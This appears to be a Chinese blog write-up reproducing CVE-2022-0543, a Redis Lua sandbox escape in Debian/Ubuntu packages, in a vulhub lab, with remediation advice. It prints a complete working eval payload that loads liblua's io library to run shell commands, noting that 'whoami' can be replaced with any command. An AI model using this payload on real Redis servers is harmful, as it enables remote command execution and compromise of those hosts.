• CVE-2022-0543 Redis沙盒逃逸漏洞


    1 漏洞信息

    漏洞名称Redis沙盒逃逸
    漏洞编号CVE-2022-0543
    危害等级高危
    CVSS评分10.0
    漏洞类型中间件漏洞
    漏洞厂商开源
    漏洞组件redis
    受影响版本2.2 <= redis < 5.0.13
    2.2 <= redis < 6.0.15
    2.2 <= redis < 6.2.5
    漏洞概述Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

    2 漏洞原理

    Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Ubuntu/Debian/CentOS等这些发行版本会在原始软件的基础上打一些补丁包,例如Debian给Redis打的补丁,增加了一个include。

    Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。

    3 环境搭建

    3.1 环境概述

    • Linux操作系统(安装了vulhub)

    • Windows主机(安装了redis客户端)

    3.2 搭建过程

    拉取CVE-2022-0543镜像

    docker ps
    
    • 1

    image-20220701090858655

    4 漏洞复现

    在攻击机中使用redis客户端对靶机进行连接

    redis-cli.exe -h 192.168.1.128(靶场ip) -p 6379(端口)
    
    • 1

    img

    输入恶意payload,这里的whoami就是要执行的命令,可以根据自己的需求更换其他命令。

    eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
    
    • 1

    img

    5 修复建议

    1、更新至最新版本

    2、在 Lua 初始化的末尾添加package=nil

  • 相关阅读:
    vue实战——路由访问权限【详解】
    python 将一列文本或字符串调整成一行 中间用逗号 单引号分隔
    XML解析库的下载和编译
    vue源码解读-权衡(性能解决方案)
    适用于LLM的代理搜索增强事实评估器 (Search-Augmented Factuality Evaluator,SAFE)
    Python小试牛刀:GUI(图形界面)实现计算器UI界面(三)
    weapp源码反编译步骤
    26-Java访问者模式 ( Visitor Pattern )
    深入了解原型与原型链
    【Spring】bean的实例化
  • 原文地址:https://blog.csdn.net/weixin_45715461/article/details/125552151